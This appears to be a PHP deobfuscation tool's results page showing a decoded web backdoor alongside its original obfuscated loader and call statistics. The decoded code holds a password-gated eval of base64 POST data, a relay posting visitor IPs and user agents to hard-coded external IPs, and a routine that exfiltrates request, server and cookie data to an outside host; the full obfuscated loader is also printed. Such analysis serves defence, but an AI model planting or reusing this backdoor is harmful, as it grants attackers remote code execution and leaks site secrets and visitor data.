Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$n0c8e="zdZ91hLpeb7QG0TjalMDCnu3okEmXIgPVYr5NUHcf2OK4AswxSiWtFRqv_6ByJ8";$x1ac=$n0c8e[40]...

Decoded Output download

if
	(
 isset  ($_POST[product_id]) && 
 md5(
 $_POST[product_id] )
==="7624e600e055e1676a7a0728f0051c69"

)

{	eval(		base64_decode(
 $_POST[image_id]) );
	exit();	};

$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash'   => $_POST['prod_hash'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
        unset($_POST['prod_hash']);
        $_POST = array_values($_POST);
    }
}

$q=[
	"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
	"#select.+into.+\@.+\;.+prepare.+\@#is",
	"#insert.+into.+values#is",
	"#update.+set.+where.+\=#is",
	"#\<\?php#is",
	"#file_put_contents[\( 	]+#is",
	"#select.+sleep\(.+\)#is",
];


$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);

foreach($q as $u){
	if(PREg_MaTch($u,$l)){



		$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
	    foreach ($ar as $v){
	        $array = array(
	                        'product'   => base64_encode($ff),
	                    );
	        $ch = curl_init(base64_decode($v));
	        curl_setopt($ch, CURLOPT_POST, 1);
	        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
	        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        curl_setopt($ch, CURLOPT_HEADER, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        $html = curl_exec($ch);
	        curl_close($ch);
	    }
		$_REQUEST = array();
		$_GET = array();
		$_POST = array();
		$_COOKIE = array();
	}
}

Did this file decode correctly?

Original Code

$n0c8e="zdZ91hLpeb7QG0TjalMDCnu3okEmXIgPVYr5NUHcf2OK4AswxSiWtFRqv_6ByJ8";$x1ac=$n0c8e[40].$n0c8e[22].$n0c8e[21].$n0c8e[39].$n0c8e[52].$n0c8e[50].$n0c8e[24].$n0c8e[21].$n0c8e[57].$n0c8e[8].$n0c8e[48].$n0c8e[50].$n0c8e[46].$n0c8e[52].$n0c8e[46];$gf0=$n0c8e[39].$n0c8e[34].$n0c8e[8].$n0c8e[16].$n0c8e[52].$n0c8e[8].$n0c8e[57].$n0c8e[40].$n0c8e[22].$n0c8e[21].$n0c8e[39].$n0c8e[52].$n0c8e[50].$n0c8e[24].$n0c8e[21];$r0c5=$n0c8e[9].$n0c8e[16].$n0c8e[46].$n0c8e[8].$n0c8e[58].$n0c8e[44].$n0c8e[57].$n0c8e[1].$n0c8e[8].$n0c8e[39].$n0c8e[24].$n0c8e[1].$n0c8e[8];if(@$x1ac($gf0)){$t14 = @$gf0('', @$r0c5('aWYKCSgKIGlzc2V0ICAoJF9QT1NUW3Byb2R1Y3RfaWRdKSAmJiAKIG1kNSgKICRfUE9TVFtwcm9kdWN0X2lkXSApCj09PSI3NjI0ZTYwMGUwNTVlMTY3NmE3YTA3MjhmMDA1MWM2OSIKCikKCnsJZXZhbCgJCWJhc2U2NF9kZWNvZGUoCiAkX1BPU1RbaW1hZ2VfaWRdKSApOwoJZXhpdCgpOwl9OwoKJGFyPVsiYUhSMGNITTZMeTh4TURZdU1UVXVNVGM1TGpJMU5RPT0iLCJhSFIwY0hNNkx5OHhNRE11TVRNNUxqRXhNeTR4TkE9PSIsImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKaWYoaXNzZXQoJF9QT1NUWydwcm9kX2hhc2gnXSkpewogICAgZm9yZWFjaCAoJGFyIGFzICR2KXsKICAgICAgICAkYXJyYXkgPSBhcnJheSgKICAgICAgICAgICAgICAgICAgICAgICAgJ3N0YXRpc3RpY3NfaGFzaCcgICA9PiAkX1BPU1RbJ3Byb2RfaGFzaCddLAogICAgICAgICAgICAgICAgICAgICAgICAndWEnID0+ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ2NsX2lwJyA9PiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXQoKICAgICAgICAgICAgICAgICAgICApOwogICAgICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCR2KSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CiAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgIHVuc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pOwogICAgICAgICRfUE9TVCA9IGFycmF5X3ZhbHVlcygkX1BPU1QpOwogICAgfQp9CgokcT1bCgkiIyhzZWxlY3R8aW5zZXJ0fHVwZGF0ZSkuKz9mcm9tLis/KGVtcGxveWVlfGFkbWluX3VzZXJ8b2NfdXNlcikjaXMiLAoJIiNzZWxlY3QuK2ludG8uK1xALitcOy4rcHJlcGFyZS4rXEAjaXMiLAoJIiNpbnNlcnQuK2ludG8uK3ZhbHVlcyNpcyIsCgkiI3VwZGF0ZS4rc2V0Lit3aGVyZS4rXD0jaXMiLAoJIiNcPFw/cGhwI2lzIiwKCSIjZmlsZV9wdXRfY29udGVudHNbXCggXHRdKyNpcyIsCgkiI3NlbGVjdC4rc2xlZXBcKC4rXCkjaXMiLApdOwoKCiRmPWpzb25fZW5jb2RlKCRfUkVRVUVTVCkuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokZmY9anNvbl9lbmNvZGUoJF9SRVFVRVNUKS5qc29uX2VuY29kZSgkX1NFUlZFUikuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokbD1zdHJ0b2xvd2VyKCRmKTsKCmZvcmVhY2goJHEgYXMgJHUpewoJaWYoUFJFZ19NYVRjaCgkdSwkbCkpewoKCgoJCSRhcj1bImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKCSAgICBmb3JlYWNoICgkYXIgYXMgJHYpewoJICAgICAgICAkYXJyYXkgPSBhcnJheSgKCSAgICAgICAgICAgICAgICAgICAgICAgICdwcm9kdWN0JyAgID0+IGJhc2U2NF9lbmNvZGUoJGZmKSwKCSAgICAgICAgICAgICAgICAgICAgKTsKCSAgICAgICAgJGNoID0gY3VybF9pbml0KGJhc2U2NF9kZWNvZGUoJHYpKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgkgICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CgkgICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKCSAgICB9CgkJJF9SRVFVRVNUID0gYXJyYXkoKTsKCQkkX0dFVCA9IGFycmF5KCk7CgkJJF9QT1NUID0gYXJyYXkoKTsKCQkkX0NPT0tJRSA9IGFycmF5KCk7Cgl9Cn0='));@$t14();}

Function Calls

base64_decode 1
create_function 1
function_exists 1

Variables

$gf0 create_function
$r0c5 base64_decode
$x1ac function_exists
$n0c8e zdZ91hLpeb7QG0TjalMDCnu3okEmXIgPVYr5NUHcf2OK4AswxSiWtFRqv_6B..

Stats

MD5 f4e08c98d6b203a85857327b502a3055
Eval Count 1
Decode Time 321 ms